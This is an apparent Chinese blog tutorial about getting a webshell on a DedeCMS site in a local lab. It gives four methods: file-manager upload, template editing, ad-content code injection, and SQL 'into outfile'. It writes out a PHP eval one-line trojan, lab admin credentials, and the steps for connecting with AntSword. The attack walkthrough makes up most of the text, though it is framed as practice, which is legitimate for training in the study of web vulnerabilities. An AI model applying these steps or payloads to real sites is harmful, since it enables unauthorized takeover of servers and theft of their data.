dedecms织梦【php网站】-----获取webshell攻略

Dedecms 是 织梦团队 的php网站管理系统 使用 小皮搭建网站

1.搭建dedecms网站

下载Dedecms压缩包,解压后,放在小皮搭建的网站根目录下。

开启小皮的Apache或者Nginx和MySQL服务

2. 获取webshell

2.1 姿势⼀:通过⽂件管理器上传WebShell

思路:dedecms 后台可以直接上传任意⽂件,可以通过⽂件管理器上传 php⽂件获取webshell..

2.1.1 访问网站进行安装

访问网址:ip/网址根目录的文件名/其中的uploads文件夹/install

http://172.16.2.41/DedeCMS/uploads/install

逐步完成安装,参数配置 数据库连接小皮的MySQL数据库。

2.1.2 配置相关信息,并进行后台登录

#后台 http://172.16.1.10/dede

#信息

username:admin

password:123456

2.1.3 上传一句话木马

登陆到后台点击 【核⼼】 --》 【⽂件式管理器】 --》 【⽂件上传】 将准备好的⼀句话代
码上传...OK

2.1.4 访问文件,蚁剑连接

双击shell.php访问,将url在蚁剑进行连接,即获得webshell

2.2 姿势⼆:修改模板⽂件拿WebShell

2.2.1 修改网站默认模板,写入一句话木马

与WPCMS类似,直接修改模板拿WebShell..

点击 【模板】 --》 【默认模板管理】 --》 【index.htm】

---》【修改】 在⽂件修改中添加phpinfo();....如下 点击保存

2.2.2 更新主页

点击 【⽣成】 --》 【更新主⻚ HTML 】 --》将主⻚位置修改为 【 ../index.php 】--》
点击 【⽣成静态】 --》点击 【更新主⻚】 再次访问站点⾸⻚可发现变化.


2.2.3 访问主页

url:172.16.2.41/DedeCMS/uploads/index.php

点击浏览,即可发现phpinfo()执行成功

2.3 姿势三:后台任意命令执⾏拿WebShell

点击 【模块】 --》 【⼴告管理】 --》 【增加⼀个新⼴告】 --》在 【⼴告内容】 处添
加⼀句话代码--》点击 【确定】


点击【代码】

获取拼接的部分路径:/DedeCMS/uploads/plus/ad_js.php?aid=1

拼接url进行访问:http://172.16.2.41/DedeCMS/uploads/plus/ad_js.php?aid=1

蚁剑进行连接,即获得webshell

2.4 姿势四: 通过后台sql命令执⾏拿webshell

点击系统---SQL命令行工具
输入:select @@basedir; 发现页面显示目录地址 可判断出网站根目录

into outfile 写入一句话木马文件
select '<?php @eval($_POST[cmd]);>' into outfile 'E:/phpstudy_pro/WWW/shell.php'

访问该木马文件,蚁剑进行连接,即获得webshell

DEDECMS 织梦 网站框架常见漏洞的利用

多种获取shell的方法练习。

练习结束,望大家能有所帮助和收获。

拜拜。。。

-------------2025/3/20 21:51

相关推荐
大白玉米7 小时前
TVBOXOS6.0双端APP二开源码完整版全开源源码重构版
java·重构·php
北极光SD-WAN组网8 小时前
工业互联网时代,如何通过混合SD-WAN提升煤炭行业智能化网络安全
网络·安全·web安全
落鹜秋水9 小时前
Cacti命令执行漏洞分析(CVE-2022-46169)
web安全·网络安全
布说在见10 小时前
踩坑与成长:WordPress、MyBatis-Plus 及前端依赖问题解决记录
服务器·学习·php
未来之窗软件服务14 小时前
网站访问信息追踪系统在安全与性能优化中的关键作用——网络安全—仙盟创梦IDE
安全·web安全·性能优化·仙盟创梦ide·东方仙盟
介一安全19 小时前
【Web安全】逻辑漏洞之URL跳转漏洞:原理、场景与防御
安全·web安全·安全威胁分析·安全性测试·逻辑漏洞·url跳转
希望奇迹很安静20 小时前
文件包含学习总结
安全·web安全·渗透测试学习
波吉爱睡觉20 小时前
文件解析漏洞大全
web安全·网络安全
八月的雨季 最後的冰吻20 小时前
php算法-- 关联数组使用,优化sip账号去重
开发语言·php
rockmelodies1 天前
【PHP安全】免费解密支持:zend52、zend53、zend54好工具
开发语言·安全·php